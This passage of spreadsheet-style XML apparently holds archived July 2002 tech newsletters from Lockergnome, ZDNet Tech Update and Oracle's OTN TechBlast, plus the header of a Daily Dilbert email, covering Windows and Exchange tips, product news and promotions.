designed\nby Susan.\n\n  \n\n GnomeTIP  \n  \n---  \n  \nShow Info gives you access to change the application associated with a\nparticular file type, rename files, and reassign permissions. One of the best\nfeatures of Show Info is it's ability to store "comments" related to a file or\napplication. This can be a great place to store information on recently made\nchanges to a file, information from others who've looked at a file, or in the\ncase of applications, serial numbers and other pertinent data you may need\nwhen dealing with tech suppor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 Top 50 Fun Sites  \n Must-Know Tech Terms  \n Top 50 Useful Sites  \n Top 75 Tech Sites  \n Top 50 PenguinCORE  \n Top 50 PenguinTWEAKS  \n\n![See You in\nAugust!]([URL]http://chris.pirillo.com[/URL]\n\n Tell a Friend About Us!  \n Suggest a Feature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n General Feedback  \n E-mail the Editors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www.lockergnome.com http://www.gnometomes.com http://www.searchstandard.com http://bitcom.ch http://www.kare.com http://www.lockergnome.com http://chris.pirillo.com http://www.lockergnome.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-lg@example.com\nFrom: Lockergnome Tech Specialist &lt;subscriptions@lockergnome.com&gt;\nDate: Wed, 10 Jul 2002 07:24:45 -0500</t>
  </si>
  <si>
    <t>Wed, 10 Jul 2002 07:24:45 -0500</t>
  </si>
  <si>
    <t>[Lockergnome Tech Specialist]  Handprint Singing</t>
  </si>
  <si>
    <t>![Lockergnome]([URL]http://images.lockergnome.com[/URL] ![Download\nOur eBooks]([URL]http://images.lockergnome.com[/URL]  \n  \n---  \n|\n\n  07.10.2002 GnomeREPORT  \n  \n---  \n  \n**WE NEED YOU TO BE AT GNOMEDEX!** That's what your employer should be telling\nyou. Microsoft Pocket PC experts will be sharing tips on improving workplace\nproductivity with portable devices. Combined with Proxim's on location\nwireless networking solutions, a Pocket PC can keep you and your co-workers\ncommunicating no matter where you are in the building. Learn how to bring Wi-\nFI and PDA technologies together for the ultimate in portable computing.\nRegister for Gnomedex today!  \n---  \n  \nReader Jack Macdonald has some advice for you would-be bards in the audience:\n\n"You mention Karaoke being featured at Gnomedex and you might want to point\nout to other Gnomies that they could practice their Karaoke on my Red Hot\nKaraoke Page site. There are the words and music for more than 1100 songs\navailable on the site and by downloading the Yamanha Midiplug (a link is\nprovided) they can even change the key of the song to suit their voice range\nas well as speed up or slow down the music to their taste. In other words, to\nhave the same experience as they would have with professional Karaoke\nequipment but at no extra cost! At this price (zero) a lot of gnomies going to\nGnomedex could be singing up a storm by being properly prepared for your\nKaraoke."\n\nTravel day on Wednesday as I head down to Ankeny, Iowa to help out a former\nco-worker and avid Gnomie with some server and networking stuff. The tough\npart is remembering everything I'll need. It never fails, though. I always,\nalways, always forget something. I can make lists two weeks in advance and\nI'll end up 30 miles down the road with a handprint on my forehead when I come\nto the realization that I left something important behind. What will it be\nthis time, I wonder? I'll let you know on Thursday.\n\nSee You in August,  \nRandy Nieland  \n\n  \n\n GnomeNETWORK  \n  \n---  \n  \n**Forwarding to Internet Address Fails**\n\n[URL]http://support.microsoft.com[/URL];EN-US;q181636\n\nClient inquires about the possibility of forwarding all internal and Internet\nemail to his AOL mailbox when he's out of the office, and I figure it's going\nto be a piece of cake. He recently acquired a new phone through Verizon along\nwith web access and a tie into his AOL mailbox, which was the driving force\nbehind this request. What I found was that Internet email proved to be easy\nusing a simple forwarding rule, but none of the internal Exchange email was\nbeing sent out to the Internet upon receipt, even though it appeared to be\nincluded in the rule. As it happens, this is due to a default configuration\noption on the Exchange 5.5 server that prevents automatic replies/forwards\nfrom being sent to the Internet using the Exchange Internet Mail Service. A\nquick configuration change and restart of IMS will put things right.\n\n  \n\n GnomeSYSTEM  \n  \n---  \n  \n**Stop the Presses**\n\n[URL]http://www.wininformant.com[/URL]\n\n... The CD presses, that is. Microsoft has given in to the greater good and\ndelayed Windows 2000 Service Pack 3 indefinitely. Sure, it's mildly\ndisappointing, but I applaud the move. Instead of trying to downplay the\npreviously identified problems with Microsoft Installer (MSI) 2.0, the service\npack will be put on ice until the issues are straightened out. Here's a quote\nfor you... Good job, Microsoft.\n\n  \n\n GnomeALERTZ  \n  \n---  \n  \n**Today's Top 5 kbAlertz**\n\n  * Q198845 - WD2000: How to Return Only File Names Using FileSearch Property (Q198845)\n  * Q310436 - Cannot Play a DVD in Windows XP (Q310436)\n  * Q321305 - How to Log On to Windows XP If You Forget Your Password or Your Password Expires (Q321305)\n  * Q321146 - Freddi Fish 2: The Case of the Haunted Schoolhouse Program Causes an Error Message in Windows XP (Q321146)\n  * Q321144 - Visioneer One Touch 8100 Scanner Causes an Error Message in Windows XP (Q321144)\n\n![TechTV's Computer\nBasics]([URL]http://www.lockergnome.com[/URL]\n**CHRIS TEACHES THE BASICS:** If you've got friends or family who want to\nlearn more about their PC, from a guy who makes things nice and easy, check\nout the VHS release of Computer Basics in the GnomeStore. Chris teams with\nTechTV cohort, Kate Botello, to lead novices on a journey through their\ncomputer. From basic interactions, to installing apps, to using the Internet\nand e-mail, Chris and Kate have all the basics covered. Help out a friend and\nget them a copy today.  \n---  \n  \nRecommend It!\n\n  \n\n GnomeASSISTANT  \n  \n---  \n  \n**Windows XP System File Checker**\n\nDean Truax mentioned the System File Checker as a possible solution to my\nWindows Media Player problem under Windows XP, and I did indeed run through it\nprior to attempting an in-place upgrade, obviously with no improvement. It's\nstill worth a mention, however, in case you're not familiar with what it's\nthere for. As you're probably aware, XP contains a file protection scheme that\nwill immediate replace any system files that are deleted or altered in any\nway, ensuring that XP is kept in a stable state. Sometimes this system can get\na little out of whack, and the SFC is meant to restore order. Note that any\nhotfixes and other Microsoft-provided updates will be left in place since they\nproperly update the DLL Cache that is used as the sanity check to determine if\na system file has been messed with. To access the SFC, simply launch a command\nprompt and type "SFC" to display a list of options.\n\n  \n\n GnomeSTUFF  \n  \n---  \n  \n**Consider This**  \nForwarded by JW\n\n[URL]http://www.computerworld.com[/URL],10801,72519,00.html\n\nThe next time you have a face-to-face with your elected representatives, you\nmight want to start asking about their opinions on technology laws that are\nbeing proposed left and right. Holding a public office seems to be introducing\nbrain death more frequently considering proposals by Senator Fritz Hollings\nand now LA congressman Howard Berman. If Mr. Berman gets his way, companies\nmay very well be allowed to hack into your systems without proof of\nprovocation in order to ensure that you are using their software according to\nthe stated rules. Mind you, if they cause colateral damage or upset other\nsystems, there isn't thing one you can do in return. Nope, they'll have legal\nprotection. This garbage is seriously getting scary. If you think it won't be\nabused, consider the case of Dimitry Skylarov when he publicly pointed out\neBook security problems with Adobe's software and was promptly thrown in jail\nfor his trouble under the authority of the Digital Millenium Copyright Act. He\nwas eventually released, but that doesn't make it any more right.\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 Tell a Friend About Us!  \n Suggest a Feature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n E-mail a Suggestion  \n Your Rant / Rave  \n General Feedback  \n The Editor's Blog  \n E-mail the Editor  \n\n\n\nSOUND SYSTEMS  \n  \n---  \n  \nYamaha RX-V1200  \nSony DAVC900  \nHarman Kardon AVR520  \nDenon AVR5803  \nPioneer VSXD811S  \nPioneer Elite VSX49TX  \nSony HTDDW840  \nYamaha HTR5560  \nBOSE LS122BK  \nSony DAVC450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images.lockergnome.com http://support.microsoft.com http://www.wininformant.com http://www.lockergnome.com http://www.computerworld.com http://www.lockergnome.com http://www.lockergnome.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-zdnet@example.com\nFrom: ZDNet Tech Update Today &lt;Online#3.19660.88-olLIlW2o6IOeGRRR.1@newsletter.online.com&gt;\nDate: Wed, 10 Jul 2002 06:32:13 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 10 Jul 2002 06:32:13 -0700 (PDT)</t>
  </si>
  <si>
    <t>ZDNet Tech Update Today &lt;Online#3.19660.88-olLIlW2o6IOeGRRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>What to look for in your next smart phone (Tech Update)</t>
  </si>
  <si>
    <t>\n\n![Tech Update Today]([URL]http://www.zdnet.com[/URL]\n|  ![Advertisement]([URL]http://www.zdnet.com[/URL]  \n\n![]([URL]http://www.techrepublic.com[/URL]\n\n| ![]([URL]http://www.zdnet.com[/URL]  \n---|---|---  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |  | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n\n![Tech Update Today]([URL]http://www.zdnet.com[/URL]  \n\n![]([URL]http://www.zdnet.com[/URL]  \n\nVITAL SIGNS FOR JULY 10, 2002  \n\n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n---  \n**David Berlind**  \n**What to look for in your next smart phone**  \nWith PDAs and cell phones on the fast path to convergence, choosing the right\ndevice is harder than ever. Before you buy one more handheld, see my\nprescription for mobile happiness.  \n![]([URL]http://www.zdnet.com[/URL] **Reader: Kyocera is\nstepping stone to the perfect smart phone**  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n**Latest from ZDNet News**  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Microsoft eyes Visa\nusers with Passport  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] No jitters here: IBM\ndrives tap new tech  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Telecom firm leaks\nstudent data to Web  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Israel, Hong Kong hotbed\nfor cyberattacks  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Microsoft puts content\nsoftware to the test  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Micron: PC demand to\nboost chip sales  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Flash! Macromedia tools\nspeak up  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Will Dell delve into\nprinters?  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] **More Enterprise News**  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n**Farber's Picks**  \n|  ![]([URL]http://www.zdnet.com[/URL]  \n---  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://techupdate.zdnet.com[/URL]  \n\nDan  \nFarber\n\n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---  \n**Tackling tough issues in e-customer service**  \nIdentity services let e-commerce sites better serve customers and secure their\ntransactions. Both **Passport** and the **Liberty Alliance** offer merchants\nsome ability to recognize customers. Check out this overview of today's\nidentity services--and find out why **PKI** is not dead yet.  \n![]([URL]http://www.zdnet.com[/URL] **Read the full story**  \n  \n  \n\n![]([URL]http://i.i.com.com[/URL]\n|  ![]([URL]http://www.zdnet.com[/URL]  \n---|---  \n  \n**Toshiba releases monster notebook**  \nWeighing in at 9.6 pounds, the new **Toshiba Satellite 1955-S801** notebook\nhas a 2.2GHz Pentium 4 desktop processor and a huge 16-inch display. The\n**desktop-replacement notebook** category also includes the Satellite 1905\nthat Toshiba introduced last month, as well as products from Hewlett-Packard.\nGateway and Dell may be looking at the concept too. The Satellite 1955 will\ncost $2,499 and sports a few features not found in other desktop-replacement\nnotebooks, including a detachable wireless keyboard and wireless mouse.  \n![]([URL]http://www.zdnet.com[/URL] **Read the full story**\n\n![]([URL]http://techupdate.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---  \n**Clone, clone, clone your disks**  \nImaging software can help you roll out new systems faster, right? The catch is\nthat fine print requirement for "identical client hardware." But Tech Update's\n**Lee Schlesinger** says new technology from IBM may be a quantum leap for\ndisk imaging.  \n![]([URL]http://www.zdnet.com[/URL] **Read his full\ncommentary**\n\n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---  \n**Tech gets set for China breakthrough**  \nIt's one of the few words that can perk up a high-technology executive these\ndays: China. Companies have attempted to tap the country's **enormous\npotential** for years, but it has become a far more attractive target recently\nas the rest of the world remains mired in **economic problems**. Now, the\nPeople's Republic of China has become one of the leading strategic\nopportunities for Intel, Nokia, Hewlett-Packard and virtually every other\nmultinational.  \n![]([URL]http://www.zdnet.com[/URL] **Read part one of this\nspecial report**\n\n**Poll: What will be the primary role of TabletPC?**  \nTech Update readers see **no shortage of applications** for Microsoft's\nTabletPC. Some of you want one, many of you say you need one. But what will be\nthe primary role of TabletPC: Vertical applications? A notebook/desktop\nreplacement? Home use? Or will it meet the same fate as previous tablet\nattempts?  \n![]([URL]http://www.zdnet.com[/URL] **Take our Quick Poll**\n\n![]([URL]http://www.zdnet.com[/URL] me at\n**dan.farber@cnet.com**  \n  \n![]([URL]http://www.zdnet.com[/URL]**Back to top**  \n  \n  \n  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |  \n  \n**Also on Tech Update Today**  \n| ![]([URL]http://www.zdnet.com[/URL]  \n---  \n![]([URL]http://www.zdnet.com[/URL]  \n**Q &amp;A;**  \n![]([URL]http://www.zdnet.com[/URL] |  **Caldera VP bullish on UnitedLinux**  \nIn part two of a Tech Update interview, **Benoy Tamang** , Caldera VP of\nstrategic development, discusses UnitedLinux's strategy regarding additional\nmembers and competition in the enterprise Linux space.  \n  \n  \n---|---  \n**FEATURE**  \n![]([URL]http://www.zdnet.com[/URL] |  **Putting Web services to work**  \nWant to get your feet wet integrating Web services? Find out how to\n**integrate Web services** on a small scale and how particular platforms can\nsimplify your efforts.  \n  \n  \n---|---  \n**PREVIOUSLY ON TECH UPDATE TODAY**  \n![]([URL]http://www.zdnet.com[/URL] |  **Should all storage be encrypted?**  \nStart-up **NeoScale** claims that its new storage encryption appliance can\nsecure any or all data bound for **Fibre Channel** -based storage--with no\nimpact on performance.  \n  \n  \n---|---  \n![]([URL]http://www.zdnet.com[/URL]**Crucial Clicks\n--products worth looking at**  \n---  \n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n| **Networking**  \n![]([URL]http://www.zdnet.com[/URL]  \n  \n---  \n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] | **Find the\nright home network**  \nChoosing the right technology to match your networking needs is vital. Here's\nhelp in making the choice.  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://techupdate.zdnet.com[/URL] reviews  \n![]([URL]http://www.zdnet.com[/URL] |  |\n![]([URL]http://www.zdnet.com[/URL] Popular\nProducts  \n---  \n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n**Networking**  \n![]([URL]http://www.zdnet.com[/URL]  \n**1**. Linksys EtherFast wireless AP  \n![]([URL]http://www.zdnet.com[/URL]  \n**2**. Linksys EtherFast router  \n![]([URL]http://www.zdnet.com[/URL]  \n**3**. Siemens SpeedStream router  \n![]([URL]http://www.zdnet.com[/URL]  \n**4**. Wireless 802.11B Router  \n![]([URL]http://www.zdnet.com[/URL]  \n**5**. NetGear HE102 802.11a wireless AP  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://techupdate.zdnet.com[/URL]**More popular\nnetworking products**  \n![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n  \n  \n**Elsewhere on ZDNet**  \n![]([URL]http://www.zdnet.com[/URL]  \n---  \n![]([URL]http://www.zdnet.com[/URL]  \n  \n**Veritas CEO Gary Bloom speaks out at Tech Update.\n\nCheck out these personal laser printer picks at ZDNet Reviews.\n\nSee how WAP works and how you should use it at Builder.com.\n\nNeed a new job? Find one today in ZDNet's Career Center.\n\nCIOs talk out about the future of IT at CNET News.com.**  \n  \n  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] | ![]([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ontact us | ![]([URL]http://www.zdnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.zdnet.com[/URL]  \n---  \n|\n\n  \n**Copyright 2002 CNET Networks, Inc. All rights reserved. ZDNet is a\nregistered service mark of CNET Networks, Inc.**\n\n|\n\n![]([URL]http://gserv.zdnet.com[/URL]  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.zdnet.com http://www.zdnet.com http://www.techrepublic.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i.i.com.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XXXXXX.YYYYY@RUHR-UNI-BOCHUM.DE\nFrom: Oracle Technology Network&lt;replies@oracleeblast.com&gt;\nDate: Wed, 10 Jul 2002 06:22:17 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 10 Jul 2002 06:22:17 -0700 (PDT)</t>
  </si>
  <si>
    <t>Oracle Technology Network&lt;replies@oracleeblast.com&gt;</t>
  </si>
  <si>
    <t>XXXXXX.YYYYY@RUHR-UNI-BOCHUM.DE</t>
  </si>
  <si>
    <t>Oracle Technology Network TechBlast - July 2002</t>
  </si>
  <si>
    <t>--next_part_of_message e e ssage Content-type: text/plain; charset=iso-8859-1 --next_part_of_message Content-Type: text/html OTN    TechBlast   July 2002 Issue The monthly TechBlast is also available through the Oracle    Technology Network website.  In        this issue: This              Month's Feature               News Software              Downloads Oracle              University New              Books Worldwide                Events:                Americas | EMEA | APAC  This          Month's Feature:  New Developer Services on OTN OTN Members: Get          Oracle Software on CD Shipped          to you Today!  Order OTN TechTracks          and receive Oracle9i Database Release 2, Oracle9i Application Server Release          2, and Oracle Developer Suite (including JDeveloper) CDs for the platform          of your choice. TechTracks is a one-year subscription, and it includes          access to Oracle Support's KnowledgeBase and CD updates shipped to you          whenever there are major new releases of Oracle software. Enter promo          code OWC for a $50 savings during the month of July. Exchange your Knowledge          through OTN Community Code Services OTN Community Code          is a web-browsable CVS repository that lets you review, customize, extend,          and share Oracle-related code and coding techniques. OTN populated it          with sample application projects, so that you can view sample code source          online, download it, submit bugs and suggestions to the development teams,          and get email notifications when code is updated. Participate in an Oracle-sponsored          project, and then create your own project and share your code with the          OTN community. Web Services Center          Now Available on OTN         The OTN Web Services          Center is a new resource for the development and deployment of Web          services. Visitors to this new Center can experience live Web service          examples, access the latest Web services technical information, and build          their own Web services using Oracle9i          JDeveloper. The Web Services Center offers information of value to          Web services architects,          developers          and newcomers. Win Great Prizes          in the OTN Web Services Challenge         Developers are encouraged to submit their own Web services to the OTN          Web Services Challenge. Entering your Web services makes you eligible          for fantastic prizes, including a fully decked-out Dell mobile workstation.          The Challenge starts August 1, so get          a head start today by learning more about the rules. You can even          preregister your          interest in the Challenge. New Internet Seminar:          J2EE and Web Services on Linux with Oracle9iAS Release 2  Attend          this on-demand Internet Seminar to learn how to use Oracle9i Application          Server Release 2 to develop high performance J2EE and Web Services applications          on the Linux operating systems. This          Month's Feature | News | Software          Downloads | Oracle University | New          Books | Worldwide Events News Special          Discount on Red Hat Linux Advanced Server          Receive up to 45% discount on the initial purchase of Red Hat Linux Advanced          Server. Find          out how! Offer valid July 1- July 31, 2002. To get more information          on Oracle and Linux, click          here.  Helping WebGain          Developers Move to Oracle9i JDeveloper         With all the consolidation taking place in the Java tools space, developers          are seeking tools that provide a complete and integrated environment for          developing J2EE applications and Web services, and also offer security          and stability for the future. Oracle9i JDeveloper delivers on all counts,          and the new WebGain          Developer Center on OTN has been created to give VisualCafe users          the resources to move          rapidly and smoothly to the integrated development environment of Oracle9i          JDeveloper. Listen          to the interview with Ted Farrell, Oracle's Senior Director of Applications          Tools Technology and former WebGain CTO, on "moving to Oracle9i JDeveloper".           Oracle9i Application          Server # 1 in ECperf Benchmarks          In its first ECperf submissions, Oracle9i Application Server Release 2          achieved the industry's best ever 'performance' benchmark at 61,863 BBops/min,          beating IBM by 39% and BEA by 63%. The proof is in: Oracle9iAS is still          faster than IBM and BEA. Oracle9iAS also achieved the best results in          the ECperf 'price/performance' category at $5/BBop, 28% better than BEA's          top result, and 54% better than IBM's top result. Get the facts: read          the Oracle9iAS ECperf Benchmark Report now and tune          into a Live Internet Seminar and Q&amp;A on Wednesday, July 17 at          8:00 a.m. PDT for a live presentation and discussion of these record setting          results.  Four Internet Seminars          on the New Security Features in Oracle9i Application Server Release 2 Watch          these four Internet Seminars to learn about the new security features          in Oracle9i Application Server Release 2. Oracle9i Application Server          Release 2 is the first application server to offer integrated support          for Single Sign-On, JAAS and an LDAP compliant directory that together          let you cost efficiently secure all your J2EE applications, portals, and          Web services. OTN Toolbar         Search OTN from anywhere on the internet with OTN Toolbar. Download          today to easily gain access to many of the key features of OTN (including          downloads, sample code, documentation, and discussion forums). New Internet Seminar          on Oracle9iAS Web Cache and ESI  Watch          this Internet Seminar and learn how Oracle9iAS Web Cache lets you accelerate          any Web application running on any server by up to 20 times. Speed applications          built in Active Server Pages, Java Server Pages, Servlets, EJBs and more.          Deploy with Web servers like Apache and Microsoft IIS as well as application          servers like BEA WebLogic, IBM WebSphere, Sun/iPlanet and, of course,          Oracle9iAS. Best of all, Oracle9iAS Web Cache uniquely supports caching          of both static and dynamically generated content without changing the          application, enabling dynamic Web sites to more efficiently deliver rich          content and therefore improving the user experience.  Oracle9i Reports          data source SDK available now         The Oracle9i          Reports data source SDK allows you to plug in your own data sources          and benefit from the sophisticated report creation and distribution environment          of Oracle9i          Reports. Check out the new documentation and samples.  Putting Forms on          the Web          Looking to move your existing Forms application from client/server to          the Web? Want the easy access and maintainability of a web deployed Forms          application? Then check          out this new paper. Struts and Oracle9i          JDeveloper         Here's a cool          new article with detailed instructions on how to configure and use          the Jakarta Struts open source Model-View-Controller framework with Oracle9i          JDeveloper.  Quickstart with          Oracle9i JDeveloper for BEA developers         Are you using BEA's WebLogic and looking for development tools? Here is          the easy way to start          using the award winning Oracle9i JDeveloper with WebLogic. And if you          want to use the fastest J2EE container, check out the migration          kit to Oracle9iAS.  Wireless and Voice          Made Easy With Oracle9i Application Server          New Internet lessons give viewers the low-down on how to use the wireless          and voice services of Oracle9i Application Server (Oracle9iAS Wireless)          to quickly and easily give access to applications and data using any device,          over any network. Learn why Oracle is a leader in wireless and voice infrastructure          for yourselves! Check          out the new Internet lessons in the FREE Mobile eKit! Snapshot Seminar:          Interwoven &amp; Oracle9iAS Content Management         Oracle and Interwoven together offer a portal ready, proven, and flexible          Enterprise Content Management solution. . Watch a 15 minute on-demand          snapshot seminar          and learn how you can let your users control their content through a portal          powered by Oracle and Interwoven.  Updated Oracle9iAS          Portal Developer Kit (PDK) - July The updated          Oracle9iAS Portal Developer Kit (PDK) highlights portlet communication.          Using the PDK, you can build smart portlets with such features as inter-portlet          communication, page to portlet communication, and portlet reusability.          This release includes new J2EE-based and Web Services samples.  Snapshot Seminar:          Documentum &amp; Oracle9iAS Content Management         Oracle and Documentum now offer a joint solution to create, manage and          deliver content through Web sites and portals. Watch a 15 minute on-demand          snapshot          seminar and learn how you can let your users control their content          through a portal powered by Oracle and Documentum. This          Month's Feature | News | Software          Downloads | Oracle University | New          Books | Worldwide Events           New Software Downloads Oracle9i          Application Server Release 2 for Windows NT/2000, AIX, and Compaq Tru64          UNIX  Oracle9iAS          TopLink 4.6 for Linux, UNIX, and Windows NT/2000  Oracle9i          Lite Release 5.0.2.0.0 for Sun SPARC Solaris  Oracle          Data Provider for .NET (ODP.NET) Beta  This          Month's Feature | News | Software          Downloads | Oracle University | New          Books | Worldwide Events Oracle          University Special Offer!          Save 45% on Oracle9i DBA Certification Training          The expanded Oracle Certification Program now offers a true certification          levels that are built to fit the needs of IT professionals as well as          organizations looking to hire them. Each level constitutes reaching a          benchmark of experience and expertise that is industry recognized and          approved. And, with each new credential can come increased opportunities,          higher pay, and more benefits to keep Oracle professionals successful.           Oracle9i Certification          Savings Plan â€“ Save 45% on 4 Instructor Led inClass courses. 4 for          the price of 2! Click          here to learn more!  Seeking                        a new job? Check out OTN                        Skills Marketplace for all open Oracle-trained positions. Need                        help implementing technology solutions to business problems?                        Oracle9i                        by Example Series tutorials can save you time. Taking                        an OCP exam? OTN members, take advantage of the 20% exam                        discount. Untitled Document Â  This            Month's Feature | News | Software            Downloads | Oracle University | New            Books | Worldwide Events New                  Books  Oracle9i                  DBA 101 Oracle9i                  DBA 101 by Marlene Theriault, Rachel Carmichael, &amp; James                  Viscusi (ISBN 0-07-222474-6) explains, step-by-step, how to effectively                  administer an Oracle database. Readers will find coverage of the                  key Oracle9i new features as well as details on the daily responsibilities                  of a DBA and tips on how to successfully accomplish those tasks.                  From the exclusive publishers of Oracle Press books, this is the                  ideal resource for the aspiring Oracle database administrator.                   Oracle9i                  Mobile Oracle9i                  Mobile by Alan Yeung, Philip Stephenson, &amp; Nicholas Pang                  (ISBN 0-07-222455-X) helps readers design, deploy, and manage                  flexible mobile applications on the Oracle platform. From the                  exclusive publishers of Oracle Press books, this resource explains                  how to use and extend the mobile services available in Oracle9iAS                  Wireless and integrate with other Oracle technologies. Mobilize                  any e-business, reach new customers, and deliver critical information                  to mobile users with the most scalable and reliable mobile infrastructure                  available.  Oracle Press User Group Program                 Oracle Press has a new User Group Program! Oracle Press supports                  the service that User Groups provide to the technical community.                  We value our relationship with community-based groups and welcome                  the opportunity to form partnerships with User Groups to disseminate                  the latest technological information available in Osborne publications.                  Osborne encourages participation by technical User Groups that                  meet regularly, discuss, teach, and troubleshoot technical topics,                  write book reviews, and publish print and/or online newsletters.                   Oracle Press can            provide User Groups:  Review              copies of Oracle Press books for newsletter reviews  Book              donations and promotional items for User Group events  30%              discount on bulk purchases of 10 or more books  And              more... Click                  here for complete details about Oracle Press' User Group Program.   This                  Month's Feature | News | Software                  Downloads | Oracle University | New                  Books | Worldwide Events Worldwide                  Events  Americas Oracle                User Group Events Find                out where new user group events are happening in your area.                  APAC OracleWorld                Online - Beijing  Over                5,000 industry professionals from all over China and the world gathered                to learn how Oracle can help your business reduce costs, improve                efficiencies, and improve the way you run your business. If you                missed OracleWorld in Copenhagen, you can get all the highlights                including keynotes, conference presentations and whitepapers online. Oracle          iSeminars: Free &amp; Live @ Your Desktop  Attend a FREE Oracle APAC iSeminar to learn more about how Oracle9i          - Application Server, Database &amp; Tools could provide you with a complete          and cost-effective e-business infrastructure.  Please                click                here for further information and online registration for all                iseminars. (Please select correct time zone &amp; click "reset").                For any                questions, please email                us.  EMEA OracleWorld                    Online - Copenhagen Thousands                    of professionals from all over the world gathered to learn how                    Oracle can help your business reduce costs, improve efficiencies,                    and improve the way you run your business. If you missed OracleWorld                    in Copenhagen, you can get all the highlights including keynotes,                    conference presentations and whitepapers online. Oracle            Technology Days Belgian &amp; Luxembourg Join us            for the Oracle Technology Days - Featuring Oracle9i Release 2 â€“            Live, Local, Free!  Join          us for this executive full-day event :         29/8/2002 - Brussels (sessions in English)         3/9/2002 - Gent (sessies in het Nederlands)         12/9/2002 - LiÃ¨ge (session en franÃ§ais) Click          here for more information and registration. Regards, Oracle          Technology Network Team UNSUBSCRIBE  When you registered at OTN, you indicated you          would like to receive e-mail updates from us. If you do not want to receive          future e-mails, please visit our update          section , log in with your username and password, and UNCHECK the          I wish to receive informational e-mails box.  USERNAME          AND PASSWORD QUESTIONS?  Forget your OTN login information? Use our password          lookup. DUPLICATE          MESSAGES?  You may          have multiple accounts on OTN. Please send a message to OTN          with the username you're using to access [URL]http://otn.oracle.com[/URL] We'll          then contact you and delete the unused account.    To be removed from Oracle's mailing lists, send an email to:  unsubscribe@oracleeblast.com with the following in the message body:  REMOVE XXXXXX.YYYYY@RUHR-UNI-BOCHUM.DE STOP  [250000/116/137209217]</t>
  </si>
  <si>
    <t>http://otn.oracle.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-dilbert@example.com\nFrom: Daily Dilbert &lt;2.20290.44-t9bsgc0tYwDu.1@ummail4.unitedmedia.com&gt;\nDate: Wed, 10 Jul 2002 06:15:18 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed, 10 Jul 2002 06:15:18 -0400 (EDT)</t>
  </si>
  <si>
    <t>Daily Dilbert &lt;2.20290.44-t9bsgc0tYwDu.1@ummail4.unitedmedia.com&gt;</t>
  </si>
  <si>
    <t>Your Daily Dilbert 07/10/2002</t>
  </si>
  <si>
